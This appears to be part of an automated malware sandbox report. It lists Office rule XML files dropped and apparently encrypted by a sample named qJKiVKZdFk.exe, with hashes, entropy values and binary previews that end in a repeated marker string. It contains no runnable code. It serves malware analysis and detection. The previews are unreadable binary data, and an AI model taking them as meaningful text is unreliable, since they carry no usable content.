                                                                                                                                      Preview:<?xmlC...[u.....Q..1Qe..)K.. U...<..Y(p....Z.../....6.l..=.......* .x.u.N./U!...W.u.#...*~.8.OuA._.}PvN.Z^.5..3...+.V......a...D.^.<f.T......)qA.M:GZ.;z.~..s,.H...K~~V........?[..R.+q..M..|. .....or&0...Q.".......=uI,Tk.t......d..R.no."c...n...A...Z.[...^.V..;n.r....N.B..q.!.B\......v.f92y.6>..o...q2]utN.Q..u8...Ic.ed......j{..;vR..,.pN. .....?7..N-..j"g...H.k.8gV..[ %...E....O$...z....:5..8~.$."+...D...........TSl|vjc._i>ea.#.....I..w.J`a..O....&..z.......~8b..n.t.......q.I..A.gp.h..=1.O..L.H..S.. .t..4.\.y.4...#.Z.t.......A~OS...f.]........i...........wsA.e.(.n...d._#.6...,.u.!5....L....Y6M;.....25w.wVx..h#=...'<.j.......$.AS..........$..<R.o...w..4.....<X.8x...;v.er.%i.6.....sy....?...y5pW...)DF.g....k..U..?&...nb....b....Z...Z.[...jO...=.xX.!.Sf.'...........mu.'.U3.q'.....w{.%.....&}.0....{..NE#..y.g;.....K.P.pGP.v.......,........>f.....@W....U$.2.d...ZVeo.zX.....`4j..T.Z.e..3#...05..h].}..,e.......O....T.......A...w..........."jz].7

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460008v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):785
                                                                                                                                      Entropy (8bit):7.702436821649897
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:0ekIi59+itP7JUGigJBx2B7joZm0UOaMBxpC/BMfDQ7H6LPukIcii9a:0ekf5gmiGTJmBwZIVMP4MfUaLUbD
                                                                                                                                      MD5:D70D48067B5330F5A02C0DA354A921A7
                                                                                                                                      SHA1:FB6813D3E538D48304B85A7A351E9A0B282B51DD
                                                                                                                                      SHA-256:005D7BD6A1C553F528864F5FDD846D47B66205AC45DA3AAE5982AC73C8B0E7E2
                                                                                                                                      SHA-512:0FF4799CF80EC34BEACB57D580B68BFED7D063597C3B64F96C679F01100901F52A4881045564DF372F962AE08F1C52071A69D9D8051B61626B1FC43AAC2417C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.......%A.i..f*._|e.........I...g.....e.....#...5!.....1eD.;....r..*O.U.\.2.`.m1y.).....M.S*.....yD!.?R.?....R.$D..6.\...gO9...4...&.sDwt.$~.G..slG..?....Yz.F.+...mh.:...*'%m..a.....g.oei#\.......*.m...... ...^.P].F..Ro._...a."0%..Vnn.......J.D......$...._.v...p...u...#;..}....O......7.;.}n...sO(...>` T...*.......GZQ1N..%.1...?..'n7..f9V..|..w...?2w.Z`..i&.6...y....F.....E.9.5..Cm5U....!...........K.3.t..^...X.>.o.2.3..r..k.7...c/.rp..1...9...^..>.1'....:J........1.g*.I.q..3..f........u..._.X..._....a.ie..j.,f...WtY.o.Q..'....y.?.*..Q.^..M....].kx}..46ai#f....ay.<....#.-.....H...h.J....=..^......-D.M@.oz~.M[.gV^OEy^...2`.i...u.U.Dz5vvN..m.{`..j5.....M|s~(mi..,tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460009v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):752
                                                                                                                                      Entropy (8bit):7.732687987105275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:+LhNADceVuTAm2ymlVY9ksJBpkWV039Cnwm75S99qbeugtBcZwZtnukIcii9a:+Lhqncxmle/zxkQbSIwZtMbD
                                                                                                                                      MD5:AD197CF9B9440CC1CF868EDA8601FDA4
                                                                                                                                      SHA1:92BE7115F0ED6C252A1A55C9AC85ABB242809491
                                                                                                                                      SHA-256:D086C61A111AF3E8CCD37B848B2C902611DE1EC8925B2B9C8553827551EFC1DD
                                                                                                                                      SHA-512:71A0C4C85DEB5E096E384F2CFFBA99CCA4A795CB14BD975BD0F844EBCA10E7A8542BB27B984635C1DCA948D4AFEDF803D1CEF1D6AC7C0338A8941261BB1873A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml\..G..'f?.'|.(......?$......._.!'T...nY........~...n.'..1..q.>............4z...[S...(..xJ+....y...i........:...&.Y.'..l..X......A.0.W./...N...;B.o.c.....,.u.......$.....-x.*.JE.....V...d.>L..{b.....=. 2..9TH...Z..N..{.j.=..1c77..BP......).f...<.R.......x......b.KF.O...M=..uO0..z..F....h."O..b..M...Z.....c...]..g.P..U7.T..R..w..B....\l~....Wbv...L..@.e...[..[ly.e._i.)..8Aq.....(..qDm.....V.ab.-.#.G.m.4l.d._......w.....@=.v.D{9.;...@(I8..4*b,.?..WW.O==..0.N?.q3E........t..n.D..?.J<..........l..EM.a...6+.1K..~.MF..jt.kZ.\gO.;.s...Y....e....9O"..`.Bm_...";.............7.....:+...*|"N....T..,f...-2..>g.n.]p~.k....W....}.Q0.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490002v13.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1428
                                                                                                                                      Entropy (8bit):7.859891928007335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XF/daFUAtegXb+sthQ/sRxngk5nwisAtbN8SbTR7QAifD4wucN8uf5SQzXubD:W3Xt//nfntKSpafD4wV8i5Si8D
                                                                                                                                      MD5:2FB41531B2C1B3C1B9B3B9F8F9649553
                                                                                                                                      SHA1:5D52D3FAC8AA0F01C00BB9D263F1C57AB801A185
                                                                                                                                      SHA-256:4C62613ED1B71F8B9224F00A87C11EEAB79E308F502700A790C9535C93CF2AD5
                                                                                                                                      SHA-512:80F8DB66B9A36A3A0010B0D59DC572E4A1482BC02BED3C867562FC7599E73A358061BAA707E7CDDD6D5B2BA991C7224227369FE2C0562FE40E14AC132BC97802
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.q.....F3...).d..N?6...-g.4.....xq;....:<...e..>C..~Mv.....'.8.@...@Gew.rGr...q.ujMvm.."..N8...[.W......W...W.j.0$Zr31...m..R.2F..X.....>.W...e....F...u..0.!.ju.A..@..[..*.F.......U'5o......m.n4...(S..j.m....a..;4..v.........+]k....h.6...?D.._%s.9..F..T...B. v*.+..|uA..4...G.^..jg.T...n...*.@b..:.9C..!y..k....y.y.SO...:.l.F.v.=.r........J....f.../....E..Q...(4C.^..'......`.^.Z...K].....k...l..Ng.<...eYq.>4..&'...r......].U.r&UWe.....hv:...q..X%+..A..E..`...d.))q/H...%x._..RI...1....Z.........]$...PI.J.dz..Q.V..."..D..h..V.H....kms2;V.Z...^. /..Rl.....l....:..q.=Q.78K..V.?........Cc..ht.."....|-u....... .s.eE7.UK.v.0....O'....i.N.....sj4...r.....kG.5[.=..~....^:b.v..9.].i...)....../..9:..s0.@.}..9.(.8.[8s."..\_B`?.....L..EAU.G`My{-:(S.......q....?X.....c..7..Rc..SaQ(e.....#/.Q>6..K..?...N..U................C.V.&`..`#...T.o.v..Z....&`p..a....QK.M.w^A.dZ`I..)....TM2.z...:.s..?.....(..g.jC........f.... ....8...,.R..6.<..5....l..Q...Mi

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490003v7.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):978
                                                                                                                                      Entropy (8bit):7.769533076952082
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:S+E6EHW/Px4gd5hWHcON+t6+mKTSmleEyIMbD:S+ZE2/PDfhrONE6+hDyIGD
                                                                                                                                      MD5:96D98467F0024719CD0F8CE036BE2DE5
                                                                                                                                      SHA1:4798D3D5CAD1B3BA1E998F868BC95F3D1F2EBE60
                                                                                                                                      SHA-256:75E36288A076B6D3F72FCDE46E61AE083B7054AE96DBDAC1BD1E4A0CD429C89E
                                                                                                                                      SHA-512:46DAF27829A2F4A778E76BC534D44F48C601EE976F4D96C0233FF1ECF42810B38C827B6AFEDDFCC4FD927045AC1CF08A5708074B0695CE07009A506DCAD95D18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlN6.q<\J=.1..3.EAAs....,=#.).o................`5f.[...X...{tU+.(L..ws1.....}]l.Av..H-....Q....P.>...Nj@.9R."..5T.B"gciN..*f.ix.|}LT">.u5.../.3Kn.Z.....u.2.....^.zv>[...'..tV*.w:..E.......,...*.._B.|.............OC...c,X.n..n......b..Q.5.+.s.....i[mA.:{p..Q>.[..T.|xN9.aV.d+.i.U....)<.....t.....~..0..f.KT...#..$...{/...!%E.Z......;.-..!J.#u..M..U...e......g@.....a;...m...[....K..rxQ.T........tZ..?h..U..7...V..9a;........".v....5.-^Y.O.;...FyL.h....Y&..O..F.(...3..yux....TD.......C..$....f.....k3...n.3.N-&..Z.jL...fp3..T.q3..7.....p..B6.Ol..iM&J..l.+....@..{..j!..C....F....p..H).r&...z..-(.k.R\..P.R.U..g(.>.*...#.#.2....i`.x[..'..Y.5.8t.h.tB.N."6*...Q..D.<.s.1..^...T.v...G|...;).r..W"Vb....H..O|.....A.+.13o{.V.f..z.>....a(.z..#k..K......m3"1.r'.D....!..V.HN.i./..y.i:>.......N.......s......b.A`.KK......._.'.!LNe..M..1We..?.X.w.O?.!'..TM..`....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490004v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1008
                                                                                                                                      Entropy (8bit):7.803852733513594
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2tyGcG7scUXA3TuicAuL3HRmx5uoy6u6fP8HmI7rfWtbD:2t9cGYcb33cA+3HRmqoy6kHmI3fsD
                                                                                                                                      MD5:B2AD052DE1A40898D2ECF7AAE70C7685
                                                                                                                                      SHA1:30F342AC2DFEF09D0279C1A921D03A40EB6CB868
                                                                                                                                      SHA-256:4750AD469DE4C058501E5C349F98C36B7C8477C5F2F66DC0746C9193A941559E
                                                                                                                                      SHA-512:24323406C6380A0B2EC42ECAF3A282FDD541EA441C5831A9186FE0FC89273CAFE1F0C55FDA0C2414DFBFD7A87E153E9DD3A1DFA2593A5005576510DAA05D4F69
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..yo.@Q5..ck618vE...M...A...PI......j......."?..et....r.~.....I...nG....;.y...6)..(."..B..b..yd2....Fe6....^../.c..,i....u.=.e..}P,._...Q..c.e-.+..j'.i....Nh.z...i....6H...%[x...E.m}..D.. 't..or.r0..=..j,..7.{..J..q_+.t..M...1Z.`..E.6X`..K?B.bF...b..}r.U,.'...y...HY....Q..j.S[.h?|.l....R&.......l.Wa<Rk...N.. e.....w....b1...".=dy..].]O.(IV9c.L.3/.......b8..*.M.Y..K.4....v..u.(#......{.a..O.B:....r.ce.S......_.p./.].a.+g9....'...i.fG.A.=.....z..........[.......f...U....X.mR.^..~C..Ht.t.:...|.FAcrk3.5?$)eY.n...WT.7"..JP...>..yjs.K...F,..H.....#..`q*.Uzf..%.p.5."...V.....W.....]... d4.,,C......S..tRU.C.'.0W-....]>......4...c.....r....k>.m.pf....[..|.;&..|.s.*.>...,K.]2.z..,;....f....:.....^y?..L!p.......=1..`i../.1.....n6.".B.*.n_&$PU.w(k.r.....t..c&.....r.k.......v..e.IY]._...R.O9.Q~.W.#.".......N...T+.;..i."..T...p.s...e]...g.%..(....)...@......`..qa....8~tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490005v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1028
                                                                                                                                      Entropy (8bit):7.804470887289513
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:D9MV4SC6gg6+wp1FXAbH2S5tMZIBkMGcC9bD:pR6FTwpEzB5tMKBSl9D
                                                                                                                                      MD5:09E4AD1F3CA6A1639D98976EF5AE78A1
                                                                                                                                      SHA1:8A28D0B0D51B42B6DD860D78814DDF0DF35373A3
                                                                                                                                      SHA-256:51FA6E26DC9ED6E93A9BE7D9423FE11082D39DCD846830AE138882A812F94A15
                                                                                                                                      SHA-512:B28B008A9097F5EF3AB001990BAE1B8FCFDDC6A75544A804BB6D35535FC31CF0942F39B3642271C3C11DC0252296E333E69DAA824289EC9D129896848B0C4DDC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml28........H.Ob:6.-.A....4.C.\D.em..U.J.u..H......E.../.nI.^...3}<.wm....6.w..3..lm...t..'.....*..}...I.g/.nm..o.O..#~jo,..L$.J...enQ<....t.M.O....`.....:8... XyE...........gg....Bx.>..,B.s.+.uv.1P."gO~.R.Fz.E..... gn.u...E..[&.L../X....V.0..&Q..H......r.. 0.....).k;/..R.X.......;.....\.n...2...a.....].%B. ......1.}..Cs.oq=..X...g#h..7._q.8|.o.\..U....}cy..Nl...Q......1.....X:.(.[.SI...Xz;x.:q6../?.e..9.j..m...T9.~.f~..ml.;]..<..9E..G).:.+v.?{9\..{..M..J....awO....SA.62..*|..k.....7...X^..'..]....}GW......f...a._....l.E...Uc.8..No....?...u.J.C.I+l.....|...h.=....<.D......}S.Z.4........`.....F]g.......jc.....7s.Z.{......pK5p)...F..\.?......6..}b.qs.&.d.L.~..!.a..>s8.ev....l.g...n..&.....i...0J .....}.x..3..yl.......vd.4V.}.+E..x.DL:/..jh.RL....N.D...G2.I|...../xg[.2..8w..DT...P.E.F2.."..br......`..~r\..O.dH4....z@m(yO7F4...<.-G.....H..*.9[v...i..u....wW..Z.(..m../b..Q..)m..o/.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490009v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1453
                                                                                                                                      Entropy (8bit):7.852274661639669
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:EtV8WdvHsznRLxeQxRyF/Fq/LHYgKv652d8gXLfnkL+uMHibD:eV9dvHsznRLxeQxMFdqztKv652ecvTTs
                                                                                                                                      MD5:48604022C10A21C2830EF8F3F05C3931
                                                                                                                                      SHA1:3F8F2AB5D3B7C347389318BD7B8220E0529B39AF
                                                                                                                                      SHA-256:6711D2B9BEC9B2B35614B547E27C72F4E09BD8D1F955E73876ED9F202A62D73F
                                                                                                                                      SHA-512:EB68600AAEF043000BA5F2C702745AAE5022FBB2C7B0F3EC83CCD1ABC6DCC64A4C67B213242842663454EAE6B6F5AAC55F18BE5D4710A51538F4E7BD18F3907B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmll*............-S........C.O.......YO.|XC....)9..b.7.TM~..\..D.......*.....G%....."..d.(......v.>...1k...Q.m..[O_.*L.....>T..7..|1>...M..8.F......3.m+.U..MH.D.d....;W...N+.B>..gTC...7h..,;.Ygw.....[.......Dx.Le....6...*......t.hp-.......t..{......J....+c.....U....s..Qn..q..........,A.....x.M..L.......`\.a;.;Km.w.".W.Z.\).*!....1AA...8.P..Fz4.xJRx.....}>8......T.N").v..F;.J..A?~.UZ.v..-....Y....Ae4..n~.i1(.3....Af..S.6_=.9$.E..F...X......`.[..B3A6xA..a...$x..^.M..X.R*.g.._.mR7z..Dz..0..R.5.JZ....N....p.....ub.n..}"....mV.[.`...R...........\...,..g,or.Q`t.*..S..z...VdK.2i'...}.....]u.....:.......8.......`='...}....NC.r...En.-.;.]c.......m.T.Y^.}G.n8D63.j....Ok@.2....s..I...\=Ca.]..._.y....C..:.g..UF.Z.R.xh..O...l...r...........)DvJ.V...m.8.P[.8q[......._A.s..wa....Th.....S6.._..z....?...r!.{.A.i.U....Y...\..(_.E.M..7...^D..u. .C.YS8L..t.WL.0F..C:B...[A......#._. ....v.....4S..R)...;:05d.f.M.Mw..N.....Un.i.a..t"g....M.]]kM.....C.....K@,K.d.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490010v7.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1388
                                                                                                                                      Entropy (8bit):7.878776750998219
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4sw85wqWHcdJCmQbMqg/3jzfvAxs31ZffVyNV9D3A2kxMbD:xRdJ3uMcxs31ZffVyNV9kJGD
                                                                                                                                      MD5:57295FCEB827C981E4656C99FDC49730
                                                                                                                                      SHA1:829787B806D4444E5B90AE81DA0407B214458E13
                                                                                                                                      SHA-256:AA1AE099FCD8A8E8A0B262811BB6A1A847D09A625D4F9E1E131C703AEB903C3C
                                                                                                                                      SHA-512:0456796E6B75579CCC00DC493C155D1B8450790C849659A2B3CA933795BDA8D55479CF0DDC6BC6A998FD23EA8967656BE4BFBD2F0C259EB70EC3108F54B63235
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Z.bp .b...>...v.;L.S.?d>.X....F ....jf........Zf.}IQ..U......[e."....G...Y........^k..(..].....OEU..E..4.S.U...M.g>.....M.H..b.=.^L...K.............V`'.&.%1.#..U.'.Tv.8;..?..1/......p..O.u.3..s...6...7a.....J._c_.J_...^ ....:@."..)./...4.]w.....T....t.{..^vi^1..i....:`B..C....w...8...g....G=i.].p...R...z....ps..dql.XZ....H..p.....z.3.Td.Oj!...<.....e....Vb...!.q....b..."..Z.?....{...e...zI+.C..z.v..2Kg;._.o..+6..Z....NID.y.m._x.....]..J.i..+..X..].2rV..d...T.VZm'..B..@.$G..D2HF...X...d)..:<..Z.\.hQ..w.r........;...gr.Ij..s0.^C.Eh.+..n.$}....!..U..o.....4...U..g..1.'......`.s.L/..$......$...+.p.q^..Y.~aj...c..070....'..T..9fD...^].......k.H..!.D.2...g.\Q........#?<Y.......mD,....DP.H@.bF..$.J.Ol..!.!=...jYX....#.v%Y..G.....|...-i.[.`...%E...ac.k...H.....{.n(..9........D##%.9z.u.K..G..!Sm.!...............@.N).....4....6g..,W"..2\I.nl...s*..Q".{(.*....GYD...(].a........`.m.$6.\..rXw...}2W.nmH....]F..K%F\...Puwn.9.....B..c..:...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):320311
                                                                                                                                      Entropy (8bit):6.632785908716544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:ijfRy3YvICy7cY3QXFqxzLVThT4ZoGGQ1jQc2G20Ei9J0CE9SN:cRy3A47FQXCzH8oK1Jei789c
                                                                                                                                      MD5:1823790EA6BF0783C41E95C1C42CE043
                                                                                                                                      SHA1:2392802A90CEE768ABE1272429ABD1FFEE598F30
                                                                                                                                      SHA-256:48C5B6EB9A76115833A2930834E1865028B4363FDEB1CDB7E70C761733CC199C
                                                                                                                                      SHA-512:7BF82CF334AE9C43B0BD133EC90229A7118E05BC28BB786B537B4DBDA919727EA1F7A675ABB1F795C7989CFD785179E82588D41C28A4DF723336D4E84F503531
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<Rule.^...U.0.!T?<......T4.g.*.B.;..8.8.{...]FK....M.@.A...\7..8[...7.@0..k.=.RH./.~92K."'.K9..Rz.=0....K...\k.>y..8VhE.#..y..!...1....Tq.....@...|OI.......M8R.r...^.p..W.l..).a..J+....w.9......V....)f\.y.h..Z.$N.H.3..{;m..&.........q....).mj.K....*..b.-..w...._.....EL. s4...j.......&.n...q,.+...k...'.s..eR..JYa.v........Tw.......D..=af@AySN$}pd.....,_..6.L....G.(.A.&..vD$....d.63...,.E.FJ....*)b..s.m.......k.....)....i6......I..P..S.eX...DM-....Fx.......7...+.~...u...7..{@.L.&....P..%!y...:".E.D..p:...'`|[. .9......B......Z5....l..j...1%@......K.1.+.hj..~:......i>..j.......-.6E..@r..A.xd.by_.+,a...Ac.~Pz.....,...-d..\^.C.O.W....!..f..?...b....~....1.t.kV+...p.....&._.....flD.T1P...C....L..#.F....%."....H......hy..Ju.i4..67..+.Cg).....#.U..+..&3..T..89r...N..|.a..au..........e...'.A!#...#.... .x.."...a"w$W.. ~.0,.w\.........)...=.W.@.R.o...].^.Y/K.tPk....fS.RU.tT....~.t......9.c..}........yi.bq...........In..=.r..z..y..k...~.p......d..b..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361051
                                                                                                                                      Entropy (8bit):6.514407538067786
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qQpYHxPsvc+JPuAE6epeCNLBRzQ4vsDdwd+DxFiu:3Xc+J59aNz03e+DDiu
                                                                                                                                      MD5:58CAF9E5AD31700E2422E52A1D60369C
                                                                                                                                      SHA1:529212E9461DF57F67AFA8C6482AE92AEE681B19
                                                                                                                                      SHA-256:193FD40A4C8562BD89C68CE7E4DE035CF80312FC414561FCDD233277ACB66142
                                                                                                                                      SHA-512:EB0211F17DB05F52DED33566300217295945167CD53BD7D962764B978F081A6C61EE38521D72EE1BEC7029D662C748D099451E6BC50635C441EE8F31B00B3141
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<Rule...Cj....:..J..c[.{TU.g...}....pD.a7.B.J.P....w.;...&.......$.|...V...E.0.l...t......x.-..,%..&.2O.]B.PX(T,......,sL...cLf....7...2k..PU..m..~..*....t..3...H...Tm...<(.T=.`..|p..2.O....L'{...........4.-..v.#cv..+..5.N......8o..".....\.p2..#..v.Pe..p... ....,Z.|>_.\?/....M.c@...O......\.U&.l.$.....<...j@.`".......CL:.24..A....6Sk`9V._..Vc..j.gm..a`8....k.......W.'.h.........h0.......%.9|....]EE.DDt<%..7...A.8...$Y..{,...>.O5....rV.20..M.*...7C.s....<d..)..S(.........%N..>.#.(<....Jt#= ....9U.....`..^.E...1.b..56Br.j...2f.....B5...........^..I.<I..b..y/....&S6...Q..W<^U....k...g.U...-.;?)...."$...7.90.G bokQ].m..R9....`&`.^.A6|q.iZ'{...'S..Y.#..G6Q.q..ps.E.A.G.....%.e.eP...V...d0.I...;o.G#.i..........c.s*.....Gh{.....7.,..BdYqj.Y.,...*.5..N@1m.A'.(..&..<...|..-i......Fi......]O....+....x.z.g..cM#..x.W.(2..)....,..U}5W`.(....@.`S|/}.<.qk....Y9.J....L..Pr%.9m/..F[.58..rm...568.-..U=c.......6.D...^3=.....a.J.WD{=F.......\......O.@kj&..mt

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120616v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):820
                                                                                                                                      Entropy (8bit):7.741127096616264
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xONEzwPYP57pAZikUOIIBuy1Rhh+Y0z/t32IIjUMAZYM93cbz8s5onCubbFnzIPe:xMEzwAxGIRiTUY0z/t32X0DTbRzIUbD
                                                                                                                                      MD5:508FD561C1BDC7B6CD3BEC9551A4E292
                                                                                                                                      SHA1:FAA636DFA35711AF14ED8CA2800ADF7D48987D50
                                                                                                                                      SHA-256:A9BA67D5B75496D4630555A336E5F77232AD7B1CF042E3B06EC8999647879456
                                                                                                                                      SHA-512:9F52CA35FEBBB2D0FDF662600330EAFAF0D069F7D285CD3B939DF2AB1F036F8339C5A4270261C2BEA80445B76FC270F415DFAAC6D622197762C14D32605D5E0F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.r#D..o..].G..G...!5q....6.....uf1.1!....s..{...x.7...._...D..&V`.<.4b......H.Gti^6s\3.......Y.3..*..eP....(....I}..".v.c...&.{c..l...$-T.X.#.i[.'...G......]......+..p^evrT'Clb...'z....n..n..:.NdWs....%k..a. .....E".....^....q.c...$<..T..m9...GE...E^eK]c....}...P...-.1......X...2.I.'.8.f..."d.:rYNA..7..Ji..M...x....S?;.O9.(s.F&.._g.].c.....h...P.G.,.N...A...8...._.........#L.P.E.^~..`..e1..nX...1Q....O.Wx...!D.....E...X.fv'a......L.....x....U..X.&O.C...`.6.J.vM'.-...}.rF.X...V......RQ.].&...W..XP`s.,.j.w.....q.Q8.3.,yiZx.......t.6!..w.......F-.w./.X2.F..B.*0.XR5l......G...~......=............A.$./.M-..>.cz.R=~...BI........M.i... .Gm....u....9..O.N...G...idp)...........cx..$G....7...;f....<.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120617v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.710547877259443
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:nDdId+RFTN3IItPUnnGUKTkgBeMsziXNCN684JT6wRJFM1CbqcNnUBWVxibukIcq:nDk+3mItPUnLsfBzHX46dXL/TVUBWVxX
                                                                                                                                      MD5:AD6B24A6784D1A85B8DA6341EA9AB810
                                                                                                                                      SHA1:110B2F6ACBBAB21177003C4C027C9B526CD90355
                                                                                                                                      SHA-256:ECE962A978EFD09CF859A0000925D23B254E391EFD69D24A5877DAEA487B75AD
                                                                                                                                      SHA-512:C87C1CBE8D3E269864977C4D497645AC7064516DA33411365CACD84854DBF4D56C0C975A8BB5003A691D13DB460D4D944589A7DA0CCC6CA1E32F5655DBE18C0C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.....L..Jp...^;.nwFr.zc..OUw.. ..2..?r..qR......(....lq....YJ..Q.p....m....b.....u.\.^...d..^.O...|.X.)N.4.+.9..... ..fs.$ju.c..d....8...........;.P.f.s....0.x..2T*c7 2(..*...w...d%-.&5,.7M.......]..M5....R..q...o....,.D.F...B....v.X..g..._....0i...N.P....Dq.>...>DN~....`.6.d.........1h.t....R.Uw.7*..u....'...d.Qh|..^.1.+.>..Z..9..;%..$......(....?..y.C-)..mV...Eq......f..RK~...i..&...?H.h^.SO..L.:.>....d..V..wX\:.I.|@..9v..a...F`N...,dk....hT....}F;......j...y..........E~..._.....]..7{.o....1...7.O6..!.v.l.l.F.S@.j..+j...Te."..*U.1.....'..6..A#.`..Q..d"=s,n79...k.c..y......{gof..]uN.J.48....[.2.......j].=.R..r.V?...............G.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120618v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):820
                                                                                                                                      Entropy (8bit):7.698985452451084
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:euoaVwC5G0Flh3ggMhGrhKZnkC5LwmObD:/oaV5FlhQgBhUh5slD
                                                                                                                                      MD5:49E679F3E735E9148ECF9C6088AD2D31
                                                                                                                                      SHA1:F6EFD75D415F847203A006D0A78A6BB720BA32AF
                                                                                                                                      SHA-256:6845E35CD2E9A76EB0C9ACF6CADCCBC83C1F246D6CA7545C27AB53F5A1F005F6
                                                                                                                                      SHA-512:78B7C5CB96EAF76630665A78658C59CE3B2E5E17D54DF3CCBED11C475BDED5D912F5A7EBF71F6D50816CE68AA70AEB4AD54B905BDA08494E905B3D7B0FB2A3DB
                                                                                                                                      Malicious:false
